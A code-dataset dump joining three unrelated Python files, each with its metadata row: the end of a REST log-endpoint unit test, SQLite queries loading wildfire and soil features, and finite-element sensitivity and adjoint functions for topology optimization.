        client = AsyncHTTPClient()
        # large payload: stored in S3 but fully returned by the task listing
        data = {'data':fake_data(2000000), 'dataset_id': 'foo', 'task_id': 'bar'}
        r = yield client.fetch('http://localhost:%d/logs'%self.port,
                method='POST', body=json.dumps(data),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 201)
        ret = json.loads(r.body)
        log_id = ret['result']
        body = conn.Object('iceprod2-logs', log_id).get()['Body'].read().decode('utf-8')
        self.assertEqual(body, data['data'])
        r = yield client.fetch('http://localhost:%d/datasets/foo/tasks/bar/logs'%(self.port,),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 200)
        ret = json.loads(r.body)
        self.assertIn('logs', ret)
        self.assertEqual(len(ret['logs']), 1)
        self.assertEqual(ret['logs'][0]['log_id'], log_id)
        self.assertEqual(data['data'], ret['logs'][0]['data'])
        # small payload: second log for the same task, not in S3
        data = {'data':fake_data(200000), 'dataset_id': 'foo', 'task_id': 'bar'}
        r = yield client.fetch('http://localhost:%d/logs'%self.port,
                method='POST', body=json.dumps(data),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 201)
        ret = json.loads(r.body)
        log_id = ret['result']
        with self.assertRaises(Exception):
            conn.Object('iceprod2-logs', log_id).get()
        # ascending order: the newer (small) log must come last
        r = yield client.fetch('http://localhost:%d/datasets/foo/tasks/bar/logs?order=asc'%(self.port,),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 200)
        ret = json.loads(r.body)
        self.assertIn('logs', ret)
        self.assertEqual(len(ret['logs']), 2)
        self.assertEqual(ret['logs'][1]['log_id'], log_id)
        self.assertEqual(data['data'], ret['logs'][1]['data'])
def load_tests(loader, tests, pattern):
    """Build this module's test suite, filtering test names via glob_tests."""
    suite = unittest.TestSuite()
    for case_class in (rest_logs_test, rest_logs_test2):
        selected = glob_tests(loader.getTestCaseNames(case_class))
        suite.addTests(loader.loadTestsFromNames(selected, case_class))
    return suite
| 41.588832 | 128 | 0.576041 | 1,982 | 16,386 | 4.680626 | 0.084258 | 0.092163 | 0.040099 | 0.056807 | 0.868276 | 0.849844 | 0.838418 | 0.790773 | 0.782473 | 0.777083 | 0 | 0.024645 | 0.25711 | 16,386 | 393 | 129 | 41.694656 | 0.737452 | 0.004821 | 0 | 0.711246 | 0 | 0.00304 | 0.201257 | 0.013329 | 0 | 0 | 0 | 0 | 0.215805 | 1 | 0.045593 | false | 0 | 0.075988 | 0.00304 | 0.133739 | 0.00304 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
593409c87bd3bfd9a6a3219d97dc7c10b8408e0d | 3,897 | py | Python | experiments/all_col_queries.py | eerichmond/ml-wildfire-prediction | 7b0fa66389f8429856896ccaf600c72c357272db | [
"CC0-1.0"
] | null | null | null | experiments/all_col_queries.py | eerichmond/ml-wildfire-prediction | 7b0fa66389f8429856896ccaf600c72c357272db | [
"CC0-1.0"
] | null | null | null | experiments/all_col_queries.py | eerichmond/ml-wildfire-prediction | 7b0fa66389f8429856896ccaf600c72c357272db | [
"CC0-1.0"
] | null | null | null | import pandas as pd
import sqlite3
def get_no_fires_df():
    """Load the 100k-sample of no-fire observations joined with soil features.

    Joins ``weather_geo_no_fire_100k`` with ``soil_geo`` on (long, lat) and
    returns one row per location/date with weather, soil, and prior-fire
    columns, plus an empty ``fire_size_class`` label (no fire occurred).

    Returns:
        pandas.DataFrame: no-fire observations.
    """
    # Fixes vs. original: the connection is now closed even if the query
    # raises (try/finally), and the pointless f-string prefix was dropped
    # (the query has no interpolated fields; '%s' belongs to strftime).
    conn = sqlite3.connect('../data/fires.sqlite')
    try:
        no_fires_df = pd.read_sql_query("""
        select
        weather_geo.long,
        weather_geo.lat,
        weather_geo.month,
        strftime('%s', weather_geo.date) as date,
        weather_geo.precipitation,
        weather_geo.pressure,
        weather_geo.humidity_2m,
        weather_geo.temp_2m,
        weather_geo.temp_dew_point_2m,
        weather_geo.temp_wet_bulb_2m,
        weather_geo.temp_max_2m,
        weather_geo.temp_min_2m,
        weather_geo.temp_range_2m,
        weather_geo.temp_0m,
        weather_geo.wind_10m,
        weather_geo.wind_max_10m,
        weather_geo.wind_min_10m,
        weather_geo.wind_range_10m,
        weather_geo.wind_50m,
        weather_geo.wind_max_50m,
        weather_geo.wind_min_50m,
        weather_geo.wind_range_50m,
        weather_geo.drought_score,
        soil.elevation,
        soil.slope_005,
        soil.slope_005_02,
        soil.slope_02_05,
        soil.slope_05_10,
        soil.slope_10_15,
        soil.slope_15_30,
        soil.slope_30_45,
        soil.slope_45,
        soil.aspect_north,
        soil.aspect_east,
        soil.aspect_south,
        soil.aspect_west,
        soil.water_land,
        soil.barren_land,
        soil.urban_land,
        soil.grass_land,
        soil.forest_land,
        soil.partial_cultivated_land,
        soil.irrigated_land,
        soil.cultivated_land,
        soil.nutrient,
        soil.rooting,
        soil.oxygen,
        soil.excess_salts,
        soil.toxicity,
        soil.workability,
        prior_fire_0_1_year,
        prior_fire_1_2_year,
        prior_fire_2_3_year,
        prior_fire_3_4_year,
        prior_fire_4_5_year,
        '' as fire_size_class
        from weather_geo_no_fire_100k as weather_geo
        inner join soil_geo as soil
        on soil.long = weather_geo.long
        and soil.lat = weather_geo.lat
        """, conn)
    finally:
        conn.close()
    return no_fires_df
def get_fires_df():
    """Load fire observations joined with soil features and fire metadata.

    Joins ``weather_geo`` with ``soil_geo`` on (long, lat) and with
    ``fires_rollup`` on (date, long, lat), restricted to a fixed set of fire
    causes, returning one labelled row (``fire_size_class``) per fire.

    Returns:
        pandas.DataFrame: fire observations.
    """
    # Fix vs. original: close the connection even if the query raises.
    conn = sqlite3.connect('../data/fires.sqlite')
    try:
        fires_df = pd.read_sql_query("""
        select
        weather_geo.long,
        weather_geo.lat,
        weather_geo.month,
        strftime('%s', weather_geo.date) as date,
        weather_geo.precipitation,
        weather_geo.pressure,
        weather_geo.humidity_2m,
        weather_geo.temp_2m,
        weather_geo.temp_dew_point_2m,
        weather_geo.temp_wet_bulb_2m,
        weather_geo.temp_max_2m,
        weather_geo.temp_min_2m,
        weather_geo.temp_range_2m,
        weather_geo.temp_0m,
        weather_geo.wind_10m,
        weather_geo.wind_max_10m,
        weather_geo.wind_min_10m,
        weather_geo.wind_range_10m,
        weather_geo.wind_50m,
        weather_geo.wind_max_50m,
        weather_geo.wind_min_50m,
        weather_geo.wind_range_50m,
        weather_geo.drought_score,
        soil.elevation,
        soil.slope_005,
        soil.slope_005_02,
        soil.slope_02_05,
        soil.slope_05_10,
        soil.slope_10_15,
        soil.slope_15_30,
        soil.slope_30_45,
        soil.slope_45,
        soil.aspect_north,
        soil.aspect_east,
        soil.aspect_south,
        soil.aspect_west,
        soil.water_land,
        soil.barren_land,
        soil.urban_land,
        soil.grass_land,
        soil.forest_land,
        soil.partial_cultivated_land,
        soil.irrigated_land,
        soil.cultivated_land,
        soil.nutrient,
        soil.rooting,
        soil.oxygen,
        soil.excess_salts,
        soil.toxicity,
        soil.workability,
        fires_rollup.prior_fire_0_1_year,
        fires_rollup.prior_fire_1_2_year,
        fires_rollup.prior_fire_2_3_year,
        fires_rollup.prior_fire_3_4_year,
        fires_rollup.prior_fire_4_5_year,
        fires_rollup.fire_size_class
        from weather_geo
        inner join soil_geo as soil
        on soil.long = weather_geo.long
        and soil.lat = weather_geo.lat
        inner join fires_rollup
        on fires_rollup.date = weather_geo.date
        and fires_rollup.long = weather_geo.long
        and fires_rollup.lat = weather_geo.lat
        and fires_rollup.cause in ('Other causes', 'Natural', 'Power', 'Recreation')
        """, conn)
    finally:
        conn.close()
    return fires_df
def get_df():
    """Return the combined fire + no-fire dataset, shuffled row-wise."""
    frames = [get_no_fires_df(), get_fires_df()]
    combined = pd.concat(frames, axis=0)
    # frac=1 resamples every row, i.e. a full shuffle
    return combined.sample(frac=1)
| 24.980769 | 80 | 0.717475 | 596 | 3,897 | 4.266779 | 0.17953 | 0.220212 | 0.088085 | 0.088085 | 0.865513 | 0.780967 | 0.747149 | 0.747149 | 0.71569 | 0.71569 | 0 | 0.043367 | 0.195278 | 3,897 | 155 | 81 | 25.141935 | 0.767538 | 0 | 0 | 0.797203 | 0 | 0 | 0.891712 | 0.299974 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020979 | false | 0 | 0.013986 | 0.006993 | 0.055944 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
5958ec46615e569a87846fda59063c9357789d33 | 27,292 | py | Python | functions_deriv.py | TOPDyn/TOPDyn | 27f5d2e025de99f14e755dd377e8177e24aa87b2 | [
"MIT"
] | 9 | 2020-12-09T12:56:02.000Z | 2021-07-07T14:48:24.000Z | functions_deriv.py | TOPDyn/TOPDyn | 27f5d2e025de99f14e755dd377e8177e24aa87b2 | [
"MIT"
] | null | null | null | functions_deriv.py | TOPDyn/TOPDyn | 27f5d2e025de99f14e755dd377e8177e24aa87b2 | [
"MIT"
] | 3 | 2020-12-08T21:52:54.000Z | 2020-12-10T22:32:38.000Z | import functions_2d as fc
import cmath
import numpy as np
from scipy.sparse.linalg import spsolve
def lambda_local_ep(ngl, ind_passive, passive_el, disp_vector, dyna_stif, coord, connect, E, v, rho):
    """ Calculates the lambda parameter (adjoint solution) of the local elastic potential energy function.

    Args:
        ngl (:obj:`int`): Degrees of freedom.
        ind_passive (:obj:`numpy.array`): Index of passive elements.
        passive_el (:obj:`numpy.array`): Passive element nodes.
        disp_vector (:obj:`numpy.array`): Displacement vector.
        dyna_stif (:obj:`numpy.array`): Dynamic stiffness matrix.
        coord (:obj:`numpy.array`): Coordinates of the element.
        connect (:obj:`numpy.array`): Element connectivity.
        E (:obj:`float`): Elastic modulus.
        v (:obj:`float`): Poisson's ratio.
        rho (:obj:`float`): Density.

    Returns:
        Lambda parameter solution.
    """
    aux1 = np.zeros(ngl, dtype=complex)
    fadj = 0
    # Assemble the adjoint load: sum over passive elements of
    # Ke @ conj(u_e), scattered into each element's global dofs.
    for i, el in enumerate(passive_el):
        Ke, _ = fc.matricesQ4(el, coord, connect, E, v, rho)
        aux1[ind_passive[i]] = Ke@disp_vector[ind_passive[i]].conjugate()
        fadj += aux1
        aux1[:] = 0  # clear the scratch vector before the next element
    fadj *= -1/2
    # Solve the adjoint system against the dynamic stiffness matrix.
    lam = spsolve(dyna_stif, fadj)
    return lam
def lambda_local_ki(ngl, ind_passive, passive_el, disp_vector, dyna_stif, omega_par, coord, connect, E, v, rho):
    """ Calculates the lambda parameter (adjoint solution) of the local kinetic energy function.

    Args:
        ngl (:obj:`int`): Degrees of freedom.
        ind_passive (:obj:`numpy.array`): Index of passive elements.
        passive_el (:obj:`numpy.array`): Passive element nodes.
        disp_vector (:obj:`numpy.array`): Displacement vector.
        dyna_stif (:obj:`numpy.array`): Dynamic stiffness matrix.
        omega_par (:obj:`float`): 2 * pi * frequency.
        coord (:obj:`numpy.array`): Coordinates of the element.
        connect (:obj:`numpy.array`): Element connectivity.
        E (:obj:`float`): Elastic modulus.
        v (:obj:`float`): Poisson's ratio.
        rho (:obj:`float`): Density.

    Returns:
        Lambda parameter solution.
    """
    # Adjoint load: -(w^2 / 2) * sum over passive elements of Me @ conj(u_e),
    # accumulated directly into the global vector (no scratch vector needed).
    fadj = np.zeros(ngl, dtype=complex)
    for idx, el in enumerate(passive_el):
        _, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
        el_dofs = ind_passive[idx]
        fadj[el_dofs] += Me @ disp_vector[el_dofs].conjugate()
    fadj *= -(omega_par**2)/2
    # Solve the adjoint system against the dynamic stiffness matrix.
    return spsolve(dyna_stif, fadj)
def lambda_compliance(disp_vector, load_vector, function):
    """ Computes the lambda (adjoint) parameter for the compliance objective.

    Args:
        disp_vector (:obj:`numpy.array`): Displacement vector.
        load_vector (:obj:`numpy.array`): Force vector.
        function (:obj:`float`): Current compliance value.

    Returns:
        Lambda parameter solution.
    """
    # Simple closed form: conj(u) . f divided by the objective value.
    return (disp_vector.conjugate() @ load_vector) / function
def lambda_ep(disp_vector, stif_matrix, dyna_stif, free_ind):
    """ Calculates the lambda (adjoint) solution of the elastic potential energy function.

    Args:
        disp_vector (:obj:`numpy.array`): Displacement vector.
        stif_matrix (:obj:`numpy.array`): Stiffness matrix.
        dyna_stif (:obj:`numpy.array`): Dynamic stiffness matrix.
        free_ind (:obj:`numpy.array`): Free dofs (None means all dofs are free).

    Returns:
        Lambda parameter solution.
    """
    lam = np.zeros(stif_matrix.shape[0], dtype=complex)
    if free_ind is None:
        # All dofs free: solve on the full system.
        rhs = -0.5 * (stif_matrix @ disp_vector.conjugate())
        lam = spsolve(dyna_stif, rhs)
    else:
        # Restrict to the free-dof partition before solving.
        K_ff = stif_matrix[free_ind, :][:, free_ind]
        rhs = -0.5 * (K_ff @ disp_vector[free_ind].conjugate())
        lam[free_ind] = spsolve(dyna_stif[free_ind, :][:, free_ind], rhs)
    return lam
def lambda_ek(disp_vector, mass_matrix, dyna_stif, omega_par, free_ind):
    """ Calculates the lambda (adjoint) solution of the kinetic energy function.

    Args:
        disp_vector (:obj:`numpy.array`): Displacement vector.
        mass_matrix (:obj:`numpy.array`): Mass matrix.
        dyna_stif (array): Stifness matrix.
        omega_par (:obj:`float`): 2 * pi * frequency.
        free_ind (:obj:`numpy.array`): Free dofs (None means all dofs are free).

    Returns:
        Lambda parameter solution.
    """
    lam = np.zeros(mass_matrix.shape[0], dtype=complex)
    # Avoid a zero right-hand side in the static (w = 0) case.
    w = omega_par if omega_par != 0 else 1e-12
    if free_ind is None:
        rhs = -(w**2) * (mass_matrix @ disp_vector.conjugate())
        lam = spsolve(dyna_stif, rhs)
    else:
        M_ff = mass_matrix[free_ind, :][:, free_ind]
        rhs = -(w**2) * (M_ff @ disp_vector[free_ind].conjugate())
        lam[free_ind] = spsolve(dyna_stif[free_ind, :][:, free_ind], rhs)
    return lam
def lambda_R(disp_vector, dyna_stif, stif_matrix, mass_matrix, omega_par, fvirg, kinetic_e, free_ind):
    """ Calculates the lambda (adjoint) solution of the strain-to-kinetic function.

    Args:
        disp_vector (:obj:`numpy.array`): Displacement vector.
        dyna_stif (array): Stifness matrix.
        stif_matrix (:obj:`numpy.array`): Stiffness matrix.
        mass_matrix (:obj:`numpy.array`): Mass matrix.
        omega_par (:obj:`float`): 2 * pi * frequency.
        fvirg (:obj:`float`): Strain-to-kinetic function.
        kinetic_e (:obj:`float`): Kinetic energy.
        free_ind (:obj:`numpy.array`): Free dofs (None means all dofs are free).

    Returns:
        Lambda parameter solution.
    """
    lam = np.zeros(mass_matrix.shape[0], dtype=complex)
    # Avoid a degenerate operator in the static (w = 0) case.
    w = omega_par if omega_par != 0 else 1e-12
    scale = -(1/(2*kinetic_e))
    if free_ind is None:
        operator = stif_matrix - (w**2)*fvirg*mass_matrix
        rhs = scale * (operator @ disp_vector.conjugate())
        lam = spsolve(dyna_stif, rhs)
    else:
        K_ff = stif_matrix[free_ind, :][:, free_ind]
        M_ff = mass_matrix[free_ind, :][:, free_ind]
        rhs = scale * ((K_ff - (w**2)*fvirg*M_ff) @ disp_vector[free_ind].conjugate())
        lam[free_ind] = spsolve(dyna_stif[free_ind, :][:, free_ind], rhs)
    return lam
# Or use @nb.njit
# @nb.jit(nopython=True)
def derivative_compliance(coord, connect, E, v, rho, alpha, beta, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam):
    """ calculates the derivative of the compliance function.

    Args:
        coord (:obj:`numpy.array`): Coordinates of the element.
        connect (:obj:`numpy.array`): Element connectivity.
        E (:obj:`float`): Elastic modulus.
        v (:obj:`float`): Poisson's ratio.
        rho (:obj:`float`): Density.
        alpha (:obj:`float`): Damping coefficient proportional to mass.
        beta (:obj:`float`): Damping coefficient proportional to stiffness.
        omega_par (:obj:`float`): 2 * pi * frequency
        p_par (:obj:`float`): Penalization power to stiffness.
        q_par (:obj:`float`): Penalization power to mass.
        x_min_m (:obj:`float`): Minimum relative densities to mass.
        x_min_k (:obj:`float`): Minimum relative densities to stiffness.
        xval (:obj:`numpy.array`): Indicates where there is mass.
        disp_vector (:obj:`numpy.array`): Displacement vector.
        lam (:obj:`float`): Lambda parameter.

    Returns:
        Derivative of the compliance function (one real value per element).
    """
    deriv_f = np.empty((len(connect), 1))
    dofs = 2  # dofs per node (2D problem)
    # 0-based global dof indices for the 8 dofs of each Q4 element
    # (connect columns 1..4 hold 1-based node ids).
    ind_dofs = (np.array([dofs*connect[:,1]-1, dofs*connect[:,1], dofs*connect[:,2]-1, dofs*connect[:,2],
                dofs*connect[:,3]-1, dofs*connect[:,3], dofs*connect[:,4]-1, dofs*connect[:,4]], dtype=int)-1).T
    for el in range(len(connect)):
        Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
        ind = ind_dofs[el, :]
        # dK/dx: SIMP-style stiffness penalization derivative.
        dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
        # dC/dx: Rayleigh (proportional) damping derivative.
        dCe = alpha * Me + beta * dKe
        if xval[el]>0.1:
            dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
        else:
            # Low-density branch: derivative of a high-order polynomial mass
            # interpolation — presumably to suppress spurious modes at low
            # densities; TODO confirm the constants against the model source.
            dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
        # d(K_dyn)/dx = dK + i*w*dC - w^2*dM
        dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
        deriv_f[el, 0] = (-lam *(disp_vector[ind].reshape(1, 8)@dKed@disp_vector[ind].reshape(8, 1)))[0,0].real
    return deriv_f
def derivative_input_power(coord, connect, E, v, rho, alpha, beta, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector):
    """ Calculates the derivative of the input power function.

    Args:
        coord (:obj:`numpy.array`): Coordinates of the element.
        connect (:obj:`numpy.array`): Element connectivity.
        E (:obj:`float`): Elastic modulus.
        v (:obj:`float`): Poisson's ratio.
        rho (:obj:`float`): Density.
        alpha (:obj:`float`): Damping coefficient proportional to mass.
        beta (:obj:`float`): Damping coefficient proportional to stiffness.
        omega_par (:obj:`float`): 2 * pi * frequency
        p_par (:obj:`float`): Penalization power to stiffness.
        q_par (:obj:`float`): Penalization power to mass.
        x_min_m (:obj:`float`): Minimum relative densities to mass.
        x_min_k (:obj:`float`): Minimum relative densities to stiffness.
        xval (:obj:`numpy.array`): Indicates where there is mass.
        disp_vector (:obj:`numpy.array`): Displacement vector.

    Returns:
        Derivative of the input power function (one real value per element).
    """
    deriv_f = np.empty((len(connect), 1))
    dofs = 2  # dofs per node (2D problem)
    # 0-based global dof indices for the 8 dofs of each Q4 element.
    ind_dofs = (np.array([dofs*connect[:,1]-1, dofs*connect[:,1], dofs*connect[:,2]-1, dofs*connect[:,2],
                dofs*connect[:,3]-1, dofs*connect[:,3], dofs*connect[:,4]-1, dofs*connect[:,4]], dtype=int)-1).T
    for el in range(len(connect)):
        Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
        ind = ind_dofs[el, :]
        # dK/dx, dC/dx, dM/dx — same interpolation scheme as
        # derivative_compliance (SIMP above 0.1, polynomial below).
        dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
        dCe = alpha * Me + beta * dKe
        if xval[el]>0.1:
            dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
        else:
            dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
        dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
        # u_e^T @ d(K_dyn)/dx @ u_e, rotated by i; the real part scaled by
        # -w/2 gives the input-power sensitivity (self-adjoint case, no lambda).
        a = 1j * (disp_vector[ind].reshape(1, 8)@dKed@disp_vector[ind].reshape(8, 1))[0,0]
        deriv_f[el, 0] = -0.5 * omega_par * a.real
    return deriv_f
def derivative_ep(coord, connect, E, v, rho, alpha, beta, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam):
    """ calculates the derivative of the elastic potential energy function.

    Args:
        coord (:obj:`numpy.array`): Coordinates of the element.
        connect (:obj:`numpy.array`): Element connectivity.
        E (:obj:`float`): Elastic modulus.
        v (:obj:`float`): Poisson's ratio.
        rho (:obj:`float`): Density.
        alpha (:obj:`float`): Damping coefficient proportional to mass.
        beta (:obj:`float`): Damping coefficient proportional to stiffness.
        omega_par (:obj:`float`): 2 * pi * frequency
        p_par (:obj:`float`): Penalization power to stiffness.
        q_par (:obj:`float`): Penalization power to mass.
        x_min_m (:obj:`float`): Minimum relative densities to mass.
        x_min_k (:obj:`float`): Minimum relative densities to stiffness.
        xval (:obj:`numpy.array`): Indicates where there is mass.
        disp_vector (:obj:`numpy.array`): Displacement.
        lam (:obj:`numpy.array`): Lambda (adjoint) vector.

    Returns:
        Derivative of the elastic potential energy function (per element).
    """
    deriv_ep = np.empty((len(connect), 1), dtype=complex)
    dofs = 2  # dofs per node (2D problem)
    # 0-based global dof indices for the 8 dofs of each Q4 element.
    ind_dofs = (np.array([dofs*connect[:,1]-1, dofs*connect[:,1], dofs*connect[:,2]-1, dofs*connect[:,2],
                dofs*connect[:,3]-1, dofs*connect[:,3], dofs*connect[:,4]-1, dofs*connect[:,4]], dtype=int)-1).T
    for el in range(len(connect)):
        Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
        ind = ind_dofs[el, :]
        dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
        dCe = alpha * Me + beta * dKe
        if xval[el]>0.1:
            dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
        else:
            # Low-density polynomial mass interpolation derivative.
            dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
        dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
        # Direct term (1/4 * Re{conj(u) dK u}) plus the adjoint term.
        deriv_ep[el, 0] = (1/4) * (disp_vector[ind].conjugate()@dKe@disp_vector[ind]).real + (lam[ind]@dKed@disp_vector[ind]).real
    return deriv_ep
def derivative_ek(coord, connect, E, v, rho, alpha, beta, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam):
    """ Calculates the derivative of the kinetic energy function.

    Args:
        coord (:obj:`numpy.array`): Coordinates of the element.
        connect (:obj:`numpy.array`): Element connectivity.
        E (:obj:`float`): Elastic modulus.
        v (:obj:`float`): Poisson's ratio.
        rho (:obj:`float`): Density.
        alpha (:obj:`float`): Damping coefficient proportional to mass.
        beta (:obj:`float`): Damping coefficient proportional to stiffness.
        omega_par (:obj:`float`): 2 * pi * frequency
        p_par (:obj:`float`): Penalization power to stiffness.
        q_par (:obj:`float`): Penalization power to mass.
        x_min_m (:obj:`float`): Minimum relative densities to mass.
        x_min_k (:obj:`float`): Minimum relative densities to stiffness.
        xval (:obj:`numpy.array`): Indicates where there is mass.
        disp_vector (:obj:`numpy.array`): Displacement vector.
        lam (:obj:`numpy.array`): Lambda (adjoint) vector.

    Returns:
        Derivative of the kinetic energy function (per element).
    """
    deriv_ek = np.empty((len(connect), 1), dtype=complex)
    dofs = 2  # dofs per node (2D problem)
    # 0-based global dof indices for the 8 dofs of each Q4 element.
    ind_dofs = (np.array([dofs*connect[:,1]-1, dofs*connect[:,1], dofs*connect[:,2]-1, dofs*connect[:,2],
                dofs*connect[:,3]-1, dofs*connect[:,3], dofs*connect[:,4]-1, dofs*connect[:,4]], dtype=int)-1).T
    for el in range(len(connect)):
        Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
        ind = ind_dofs[el, :]
        dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
        dCe = alpha * Me + beta * dKe
        if xval[el]>0.1:
            dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
        else:
            # Low-density polynomial mass interpolation derivative.
            dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
        dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
        # Direct term (w^2/4 * Re{conj(u) dM u}) plus the adjoint term.
        deriv_ek[el, 0] = ((omega_par**2)/4) * (disp_vector[ind].conjugate()@dMe@disp_vector[ind]).real + (lam[ind]@dKed@disp_vector[ind]).real
    return deriv_ek
def derivative_R(coord, connect, E, v, rho, alpha, beta, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam, fvirg, kinetic_e):
    """ Calculates the derivative of the strain-to-kinetic function.

    Args:
        coord (:obj:`numpy.array`): Coordinates of the element.
        connect (:obj:`numpy.array`): Element connectivity.
        E (:obj:`float`): Elastic modulus.
        v (:obj:`float`): Poisson's ratio.
        rho (:obj:`float`): Density.
        alpha (:obj:`float`): Damping coefficient proportional to mass.
        beta (:obj:`float`): Damping coefficient proportional to stiffness.
        omega_par (:obj:`float`): 2 * pi * frequency
        p_par (:obj:`float`): Penalization power to stiffness.
        q_par (:obj:`float`): Penalization power to mass.
        x_min_m (:obj:`float`): Minimum relative densities to mass.
        x_min_k (:obj:`float`): Minimum relative densities to stiffness.
        xval (:obj:`numpy.array`): Indicates where there is mass.
        disp_vector (:obj:`numpy.array`): Displacement vector.
        lam (:obj:`numpy.array`): Lambda (adjoint) vector.
        fvirg (:obj:`float`): Strain-to-kinetic function.
        kinetic_e (:obj:`float`): Kinetic energy function.

    Returns:
        Derivative of the strain-to-kinetic function (per element).
    """
    deriv_R = np.empty((len(connect), 1), dtype=complex)
    dofs = 2  # dofs per node (2D problem)
    # 0-based global dof indices for the 8 dofs of each Q4 element.
    ind_dofs = (np.array([dofs*connect[:,1]-1, dofs*connect[:,1], dofs*connect[:,2]-1, dofs*connect[:,2],
                dofs*connect[:,3]-1, dofs*connect[:,3], dofs*connect[:,4]-1, dofs*connect[:,4]], dtype=int)-1).T
    for el in range(len(connect)):
        Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
        ind = ind_dofs[el, :]
        dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
        dCe = alpha * Me + beta * dKe
        if xval[el]>0.1:
            dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
        else:
            # Low-density polynomial mass interpolation derivative.
            dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
        dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
        # Quotient-rule direct term (dK - w^2 * fvirg * dM, scaled by the
        # kinetic energy) plus the adjoint term.
        deriv_R[el, 0] = 1/(4*kinetic_e) * (disp_vector[ind].conjugate()@(dKe - (omega_par**2)*fvirg*dMe)@disp_vector[ind]).real + \
                        (lam[ind]@dKed@disp_vector[ind]).real
    return deriv_R
def derivative_local_ep(passive_el, lam, ind_dofs, xval, disp_vector, connect, coord, E, v, rho, x_min_k, x_min_m, omega_par, alpha, beta, p_par, q_par):
    """ Calculates the derivative of the local elastic potential energy function.

    Args:
        passive_el (:obj:`numpy.array`): Passive element nodes.
        lam (:obj:`numpy.array`): Lambda (adjoint) vector.
        ind_dofs (:obj:`numpy.array`): Global dof indices per element (8 per Q4 element).
        xval (:obj:`numpy.array`): Indicates where there is mass.
        disp_vector (:obj:`numpy.array`): Displacement vector.
        connect (:obj:`numpy.array`): Element connectivity.
        coord (:obj:`numpy.array`): Coordinates of the element.
        E (:obj:`float`): Elastic modulus.
        v (:obj:`float`): Poisson's ratio.
        rho (:obj:`float`): Density.
        x_min_m (:obj:`float`): Minimum relative densities to mass.
        x_min_k (:obj:`float`): Minimum relative densities to stiffness.
        omega_par (:obj:`float`): 2 * pi * frequency.
        alpha (:obj:`float`): Damping coefficient proportional to mass.
        beta (:obj:`float`): Damping coefficient proportional to stiffness.
        p_par (:obj:`int`): Penalization power to stiffness.
        q_par (:obj:`int`): Penalization power to mass.

    Returns:
        Derivative of the local elastic potential energy function (per element).
    """
    deriv_f = np.empty((len(connect), 1), dtype=complex)
    for el in range(len(connect)):
        Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
        ind = ind_dofs[el, :]
        dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
        dCe = alpha * Me + beta * dKe
        if xval[el]>0.1:
            dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
        else:
            # Low-density polynomial mass interpolation derivative.
            dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
        dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
        # Only passive elements contribute the direct term; all elements
        # contribute the adjoint term.
        if el in passive_el:
            # NOTE(review): here the 1/4 factor multiplies BOTH the direct and
            # the adjoint term, whereas derivative_ep applies 1/4 only to the
            # direct term — confirm which scaling is intended.
            deriv_f[el, 0] = (1/4) * ((disp_vector[ind].reshape(1, -1).conjugate() @ dKe @ disp_vector[ind]) + (lam[ind].reshape(1, -1) @ dKed @ disp_vector[ind]).real)[0]
        else:
            deriv_f[el, 0] = ((lam[ind].reshape(1, -1) @ dKed @ disp_vector[ind]).real)[0]
    return deriv_f
